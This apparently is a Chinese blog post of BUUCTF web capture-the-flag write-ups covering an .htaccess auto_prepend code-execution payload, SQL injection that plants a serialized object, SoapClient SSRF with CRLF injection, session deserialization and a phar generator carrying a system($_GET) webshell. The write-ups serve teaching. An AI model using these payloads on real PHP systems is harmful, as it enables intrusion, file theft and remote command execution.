BUUCTF刷题十一道(11)

原创 已于 2024-03-27 09:09:25 修改 · 897 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web #buuctf

于 2024-03-27 09:07:59 首次发布
本文围绕BUUCTF中的Web题目展开,涵盖[羊城杯2020]easyphp、[安洵杯 2019]不是文件上传等多道题目。介绍了上传.htaccess文件代码执行、利用PHP原生类、CRLF注入、SSRF、匿名函数计数、弱口令登录、伪协议读源码及phar反序列化等解题思路与技巧。

文章目录

打开BUU排行榜仰望各位大佬,想来我所谓的努力还是微不足道

[羊城杯2020]easyphp


<?php
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {//检测如果不是index.php就删掉
                unlink($file);
            }
        }
    }
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {//检测是否设置了content和filename
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {//检测上传的文件是不是以字母加点开头的
        echo "Hacker";
        die();
    }
    $files = scandir('./'); 
    foreach($files as $file) {//再次检测当前文件夹,删除非index.php的文件
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nHello, world");//在写入内容最后加上\nHello World
?>

上传.htaccess文件,设置auto_prepend_file包含.htaccess文件进行代码执行


php_value auto_prepend_fil\
e .htaccess
#<?php system('cat /fl??');?>\

测试发现使用append_file没有效果
file用反斜杠进行换行分割,看别人的博客发现应该是.htaccess文件的特性

井号在.htaccess文件中是注释符的意思,当.htaccess文件被自动包含到index.php时,是以文本形式进行包含的,所以井号没有起到注释符的意思,直到匹配到<?php时才认为是代码开始


# 1.php
<?php
include("1.txt")
?>

1.txt

#<?php phpinfo?>

在这里插入图片描述

而最终的转义符,是要将\n的转义符进行转义,使得换行符失效,否则.htaccess文件会变成


php_value auto_prepend_fil\
e .htaccess
#<?php system('cat /fl??');?>
Hello World

不符合其语法

payload:

?filename=.htaccess&content=php_value%20auto_prepend_fil%5C%0Ae%20.htaccess%0A%23%3C%3Fphp%20system('cat%20/fl??')%3B%3F%3E%5C

[安洵杯 2019]不是文件上传

[安洵杯 2019]不是文件上传


<?php
class helper {
	protected $folder = "pic/";   //图片文件夹
	protected $ifview = False; 
	protected $config = "config.txt"; 
	// The function is not yet perfect, it is not open yet.

	public function upload($input="file")
	{
		$fileinfo = $this->getfile($input);   //获取上传文件
		$array = array();
		$array["title"] = $fileinfo['title'];	//title
		$array["filename"] = $fileinfo['filename'];		//filename
		$array["ext"] = $fileinfo['ext'];		//后缀
		$array["path"] = $fileinfo['path'];		//路径
		$img_ext = getimagesize($_FILES[$input]["tmp_name"]);	
		$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
		$array["attr"] = serialize($my_ext);
		$id = $this->save($array);
		if ($id == 0){
			die("Something wrong!");
		}
		echo "<br>";
		echo "<p>Your images is uploaded successfully. And your image's id is $id.</p>";
	}

	public function getfile($input)
	{
		if(isset($input)){
			$rs = $this->check($_FILES[$input]);  //过滤
		}
		return $rs;
	}

	public function check($info)
	{
		$basename = substr(md5(time().uniqid()),9,16);  //随机名
		$filename = $info["name"];			
		$ext = substr(strrchr($filename, '.'), 1);
		$cate_exts = array("jpg","gif","png","jpeg");
		if(!in_array($ext,$cate_exts)){
			die("<p>Please upload the correct image file!!!</p>");
		}
	    $title = str_replace(".".$ext,'',$filename);
	    return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
	}//检测文件后缀类型并赋予随机名

	public function save($data)
	{
		if(!$data || !is_array($data)){
			die("Something wrong!");
		}
		$id = $this->insert_array($data);
		return $id;
	}

	public function insert_array($data)
	{	
		$con = mysqli_connect("127.0.0.1","root","root","pic_base");
		if (mysqli_connect_errno($con)) 
		{ 
		    die("Connect MySQL Fail:".mysqli_connect_error());
		}
		$sql_fields = array();
		$sql_val = array();
		foreach($data as $key=>$value){
			$key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);		
			$value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);
			$sql_fields[] = "`".$key_temp."`";
			$sql_val[] = "'".$value_temp."'";
		}
		$sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";
		mysqli_query($con, $sql);
		$id = mysqli_insert_id($con);
		mysqli_close($con);
		return $id;
	}

	public function view_files($path){
		if ($this->ifview == False){//ifview要为true
			return False;
			//The function is not yet perfect, it is not open yet.
		}
		$content = file_get_contents($path); //获取指定$path文件内容进行输出
		echo $content;
	}

	function __destruct(){
		# Read some config html
		$this->view_files($this->config);  //对象调用结束会调用view_file获取config文件内容
	}
}

?>

show.php关键代码



<?php

class show{
	public $con;

	public function Get_All_Images(){
		$sql = "SELECT * FROM images";
		$result = mysqli_query($this->con, $sql);
		if ($result->num_rows > 0){
		    while($row = $result->fetch_assoc()){
		    	if($row["attr"]){
		    		$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
					$attr = unserialize($attr_temp);//最终会对$attr进行反序列化
				}
		        echo "<p>id=".$row["id"]." filename=".$row["filename"]." path=".$row["path"]."</p>";
		    }
		}else{
		    echo "<p>You have not uploaded an image yet.</p>";
		}
		mysqli_close($this->con);
	}
?>

最终payload


<?php
class helper {
    protected $ifview = True; 
    protected $config = "/flag";
}
$a = new helper();
echo serialize($a);
?>

O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}
经过check处理后,protected属性成员不可见字符会替换为\0,所以我们也进行相应替换
O:6:"helper":2:{s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}

sql语句上传内容为


INSERT INTO images (`title`,`filename`,`ext`,`path`,`attr`) VALUES('value','value.jpg','jpg','pic/value.jpg','序列化')

payload触发顺序就是

  1. 通过show.php,获取images表中的所有数据条目
  2. 然后对每个条目中的attr进行反序列化处理,
  3. 如果attr是一个helper类,进行反序列化对象销毁的时候就会调用view_file()将config文件内容进行输出

所以我们上传文件的时候随意将前面这几个字段进行闭合拼接构造,上传文件名中不能有双引号,所以进行16进制编码

filename="1','1','1','1',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d),('1.jpg"

在这里插入图片描述
访问show.php
在这里插入图片描述

bestphp’s revenge

看大佬写的博客

PHP 原生类的利用小结
bestphp‘s revenge/ 安洵杯Babyphp(phpsession题目)

  • CRLF注入

当请求报文中有请求字段用户可控时,可以注入\r\n回车换行,服务器解析请求时匹配到回车换行就将剩余内容当作请求体进行处理

  • 利用Soap类进行SSRF

<?php
$target = "http://127.0.0.1/flag.php";
$options=array('location' => $target,
'user_agent' => "N0rth3ty\r\nCookie: PHPSESSID=tcjr6nadpk3md7jbgioa6elfk4\r\n",
'uri' => "123");
$attack = new SoapClient(null,$options);
$payload = urlencode(serialize($attack));
echo $payload;

Soap中有__call()魔术方法,调用其中不存在的函数,会自动向$options指定的URL发起http请求

  • php session 反序列化

存储session内容的时候PHP有三个处理器

  1. php处理器
  2. php_serialize处理器
  3. php_binary处理器

经处理后的session文件存储内容分别如下

当 session.serialize_handler=php 时,session文件内容为: session|s:9:"haoxiaozi";

当 session.serialize_handler=php_serialize 时,session文件为: a:1:{s:7:"session";s:9:"haoxiaozi";}

当 session.serialize_handler=php_binary 时,session文件内容为: 二进制字符sessions:9:"haoxiaozi";

当存储session的脚本和获取session脚本使用处理器不相同时就可能导致反序列化漏洞的产生

如果使用php_serialize处理器进行存储|a:1:{s:7:"session";s:9:"haoxiaozi";},到session文件中内容为
a:1:{s:7:"session";s:44:"|O:7:"XianZhi":1:{s:4:"name";s:7:"xianzhi";}";}

那么用php处理器进行处理时,|会被当做分隔符,前面的内容为键值,后面的内容为


<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);
?>

implode,将一个一维数组转换为字符串

reset,指针重新指向数组开头

目录扫描到flag.php


only localhost can get flag!
session_start(); 
echo 'only localhost can get flag!'; 
$flag = 'LCTF{*************************}'; 
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1")
{ $_SESSION['flag'] = $flag; } 
only localhost can get flag!

要求127.0.0.1的请求才能获取flag,利用SSRF进行获取

  1. 先构造soap请求本地flag文件的session序列化内容,序列化处理器改成php_serialize
    
$target = 'http://127.0.0.1/flag.php';
$b = new SoapClient(null, array('location' => $target,
    'user_agent' => "npfs\r\nCookie:PHPSESSID=123456\r\n",// r n 也就是空行回车
    'uri' => "http://127.0.0.1/"));
 
$se = serialize($b);
echo "|" . urlencode($se);

// 原文链接:https://blog.youkuaiyun.com/qq_62046696/article/details/128110981

GET:f=session_startPOST:serialize_handler=php_serialize name=|O%3A10%3A%22SoapClient%22%3A4%3A%7Bs%3A3%3A%22uri%22%3Bs%3A17%3A%22http%3A%2F%2F127.0.0.1%2F%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A11%3A%22_user_agent%22%3Bs%3A31%3A%22npfs%0D%0ACookie%3APHPSESSID%3D123456%0D%0A%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D
可以看到session正常的以serialize的形式存入
在这里插入图片描述

  1. 将解析处理器换为php,也就是默认处理器,利用call_user_func,传入extract进行变量覆盖,将b替换为call_user_func
  2. 传入name=SoapClient,后面调用的就是call_user_func('call_user_func','array('SoapClient', 'welcome_to_the_lctf2018')')
  3. 也就是调用SoapClient类不存在的welcome_to_the_lctf2018方法
    在这里插入图片描述
    可以看到session数据第一个已经变为我们想要的SoapClient请求数据
    改Cookie中PHPSESSID为123456,再次请求
    在这里插入图片描述

【为什么需要sessid设置为payload中的才能获取flag内容】

[SUCTF 2018]annonymous

BUUCTF:[SUCTF 2018]annonymous

creat_function(string $args,string $code),创建一个匿名函数,每次创建都会生成%00lambda_%d
在这里插入图片描述

%d是持续递增的,这里的%d会一直递增到最大长度直到结束,通过大量的请求来迫使Pre-fork模式启动
Apache启动新的线程,这样这里的%d会刷新为1,就可以预测了


import requests
while True:
    r=requests.get('http://a10002f2-2091-47dc-9b7c-996d05cd4faa.node3.buuoj.cn/?func_name=%00lambda_1')
    if 'flag' in r.text:
        print(r.text)
        break
    print('Testing.......')

BUU对爆破线程有要求,直接重启一个题目环境,进题目环境的时候就直接带上?func_name=%00lambda_1

因为程序执行的时候匿名函数计数都是从%00lambda_1开始的

查看源码
在这里插入图片描述
或者访问%00lambda_10,效果相同

[GXYCTF2019]BabysqliV3.0

弱口令admin/password进行登录
在这里插入图片描述
注意到url栏有文件包含,尝试访问其他页面发现有关键词过滤
用伪协议读取upoload.php源码

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 

<form action="" method="post" enctype="multipart/form-data">
	上传文件
	<input type="file" name="file" />
	<input type="submit" name="submit" value="上传" />
</form>

<?php
error_reporting(0);
class Uploader{
	public $Filename;
	public $cmd;
	public $token;
	

	function __construct(){
		$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
		$ext = ".txt";
		@mkdir($sandbox, 0777, true);
		if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){//检测name参数
			$this->Filename = $_GET['name'];
		}
		else{
			$this->Filename = $sandbox.$_SESSION['user'].$ext;//新建随机文件名+.txt后缀
		}

		$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
		$this->token = $_SESSION['user'];
	}

	function upload($file){
		global $sandbox;
		global $ext;

		if(preg_match("[^a-z0-9]", $this->Filename)){
			$this->cmd = "die('illegal filename!');";
		}
		else{
			if($file['size'] > 1024){
				$this->cmd = "die('you are too big (′▽`〃)');";
			}
			else{
				$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
			}
		}
	}

	function __toString(){
		global $sandbox;
		global $ext;
		// return $sandbox.$this->Filename.$ext;
		return $this->Filename;
	}

	function __destruct(){
		if($this->token != $_SESSION['user']){
			$this->cmd = "die('check token falied!');";
		}
		eval($this->cmd);
	}
}

if(isset($_FILES['file'])) {
	$uploader = new Uploader();
	$uploader->upload($_FILES["file"]);
	if(@file_get_contents($uploader)){
		echo "下面是你上传的文件:<br>".$uploader."<br>";
		echo file_get_contents($uploader);
	}
}

?>

phar反序列化,上传包含1.php的1.zip文件,传入name参数进行文件包含


 
<?php
 
 
class Uploader{
		public $Filename = 'aaa';
		//public $cmd ='echo phpinfo();';//可先用此测试
		public $cmd ='echo system($_GET["hack"]);';//传递一个可控hack参数
		public $token ='GXY4de07d94caf018e1453439fff2b2375b';//先上串一个合法文件得到session['user']
		
}
 
@unlink("demo.phar");
$phar = new Phar("demo.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF8a<?php __HALT_COMPILER();?>");
$o    = new Uploader();
$phar -> setMetadata($o);//将自定义的meta-data存入manifest
$phar -> addFromString("text.txt","test");//添加要压缩的文件
//签名自动计算
$phar -> stopBuffering();
 
?>

在这里插入图片描述

[羊城杯 2020] easyphp
rev1ve的博客
09-01 1114
思路:向.htaccess文件写入shell,并且用auto_prepend_file包含.htaccess,但是file关键字被ban了,可以用换行绕过,结尾要用\处理content中的\n。接着就是对上传文件写入内容的黑名单过滤,然后对文件名正则匹配无字母。下的所有文件和文件夹的列表,然后如果不为index.php,则。既然文件名无字母,我们可以用.htaccess配置文件攻击。由于这里有换行,我们丢到cyberchef里url编码。编码一下上传,得到flag。修改命令,要绕过一下。
buuctf记录
weixin_53409153的博客
05-25 444
最近这段时间除了再写iscc外(当然,我比较菜,会做的有限,但是也还是在学习的过程中)在其他时候,也是会写一点buuctf上的的。在加上一点以前写的一部分,算下来也有20多,现在就统一记录一下吧,后面要是在了,在往后面补充。 easyre 这其实不用多说,拿后,直接查壳,发现无壳,且是64位的,拖入IDA中Shift+F12就可以直接看到falg 得到flag{this_Is_a_EaSyRe} reverse1 其实大部分逆向的,在最开始的地方还是很像的,这依旧是查壳, 无壳,
SQLi-LABS 1-22关(Basic Challenges) 手动注入--(缓慢更新中 12/22)
燕麦葡萄干的博客
11-18 3855
首先判断注入类型,分别使用?时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间变长,时间盲注多与if(expr1,expr2,expr3)结合使用,此if语句意思为:如果expr1是TRUE,则if()的返回值是expr2;进入到MySQL所在目录,我这里是D:\software\phpstudy_pro\Extensions\MySQL5.7.26\bin,目录栏直接输入cmd调出cmd终端,输入mysql -u root -p ,然后输入密码即可成功登陆数据库。
BUU SQL COURSE 1 1(SQL注入)
小谢的博客
10-25 5573
BUU SQL COURSE 1 1(SQL注入)
BUU SQL COURSE 11
WEB渗透测试 从入门到萌新
04-19 1633
打开之后 F12查看 http://7a0c2d1a-3ae3-4815-850d-9e229cef2e1f.node4.buuoj.cn:81/backend/content_detail.php?id=1 找到注入点 sql手工注入流程 1、判断注入类型 ?id=1 or 1=1 ?id=1' or '1'='1 2、判断列数:?id=1 order by 1,2,3 3、判断注入点:?id=-1 union select 1?id=-1 union select 1,2,3 ..
BUU SQL COURSE 11 SQL注入
2301_80428402的博客
07-11 2707
admin因为一些原因后面几步无图了可以看一下大佬的视频我的文字也是从中摘要【BUUCTF BUU SQL COURSE 1 1 教程】 https://www.bilibili.com/video/BV1uN411m7HC/?
buuctf
最新发布
2401_88331513的博客
07-20 669
本文总结了4CTF目的解过程:1.EasySQL1通过SQL注入,使用万能账号'or1=1#成功获取flag;2.Havefun1通过分析源码,发现GET传参cat=dog即可显示flag;3.Include1利用PHP伪协议读取flag.php的base64编码内容,解码后获得flag;4.WarmUp通过分析source.php代码,构造多层目录跳转payload获取隐藏flag。每目都通过分析源码或参数构造,最终获取到相应flag。
buuctf记录24 equation
ytj00的博客
08-08 709
又一次加强了我的z3 目有个html打开得到 根据目提示这个是f**k加密 可以到在线网站上一个个去解密,但是太麻烦了,用了个网上的脚本, 得到 最后有一个常量没解,放到上面网站解出81 头疼,全是解方程,可以用z3来解 构造脚本麻烦死了, from z3 import * if __name__ == "__main__": s = Solver() l = [Int('l[%d]' % i) for i in range(42)] #定义l[0] - l[41
buuctf之旅() 知识点+坑
qq_50589021的博客
11-05 2187
[NCTF2019]True XML cookbook WP 最后一位不一定是11,需要自己内网探测 打2021的geek大挑战了 [MRCTF2020]套娃 WP [极客大挑战 2019]RCE ME WP [CISCN2019 华北赛区 Day1 Web2]ikun JWT、pickle反序列化 WP [WUSTCTF2020]颜值成绩查询 import requests url= 'http://b91f52c4-276b-4113-9ede-54fb712ac6da.node3.buuoj.cn/
buuctfweb
01-17
### BUUCTF Web 类型练习 #### 网站源码备份文件泄露和PHP反序列化 在BUUCTF平台上,有一涉及网站源码备份文件泄露和PHP反序列化的目。这类目通常要求参赛者找到并利用服务器上存在的`.bak`或其他...
BUU UPLOAD COURSE 11
2401_86760082的博客
01-22 455
如果直接上传 shell.php 文件,虽然显示上传成功,但在访问的时候会显示。得到带有木马的图片,可以将图片用记事本打开。接下来便是用蚁剑连接找到flag。故我们上传一个带有木马的图片。进入目是一个文件上传页面。在文件地址处输入cmd。最后一行有一句话木马。
【CTF】BUU BURP COURSE 11
weixin_42515203的博客
06-24 789
BUU BURP COURSE 11,构造本地访问的header信息!
BUU LFI COURSE 11(分享)
TinFrog的博客
07-17 758
BUU LFI COURSE 11(分享)
BUUCTFUpload-Labs记录pass-11~pass-20
Goodric的博客
07-26 866
白名单上传:`'jpg','png','gif'` 上传抓包可以看到url中的结构。
靶机高安全上传php木马,BUU UPLOAD COURSE | 一句话木马实操(PHP)
weixin_42146888的博客
03-11 1063
BUU UPLOAD COURSE | 一句话木马实操(PHP)这是一上传一句话木马的裸,解思路也很明确,现在此详细记录,以供日后复习知识点用一句话木马:当知了URL,就可以利用本地一张网页进行连接得到Webshellphp 一句话木马当这条语句被服务端执行了,我们同时利用 POST 请求上传变量 x 的值,例如 x=echo ‘Hello’php 解析器执行的实质上是 @eval("ec...
buu(sql注入)
qq_62046696的博客
08-23 1830
打开界面,我们发现是 admin账号还是monster,这肯定与cookie有关,直接在cookie中。列数不对,or也被过滤,大小写,双写都不能绕过,呃呃呃,这样order,information都被过滤了。回显位置,2,3现在我们需要找一个命令替换掉,information.schema_tables,这应该是注入点的位置, 发现# --+被过滤,然后是上传发现,没空格,那就有/**/代替空格。啥都没有,考察cookie用admin登录,都不需要密码,感觉挺离谱的,直接出来试一下monster,..
BUUCTFBUU SQL COURSE 1 1
qq_41369524的博客
12-10 3482
进到burp里面看:id=1,id=2。推断可能是根据SQL查询得到的不同界面结果。例如select * from 表名 where id=1;再试一次,发现原来是之前粘贴少了一个字母,成功拿到flag。试试3,试试2,发现2有回显,所以试探出该表有两列。看到了username和password。先审目名字应该是关于SQL注入的。没有结果,考虑一下MD5解密,解不了。在界面随便点点,发现是POST。首先,判断其是字符型还是数字型。返回结果相同,所以是数字型。得到用户名是admin。
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 8223
参考之前写的:https://blog.youkuaiyun.com/qq_39583774/article/details/120722112?此详解可以看:https://blog.youkuaiyun.com/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值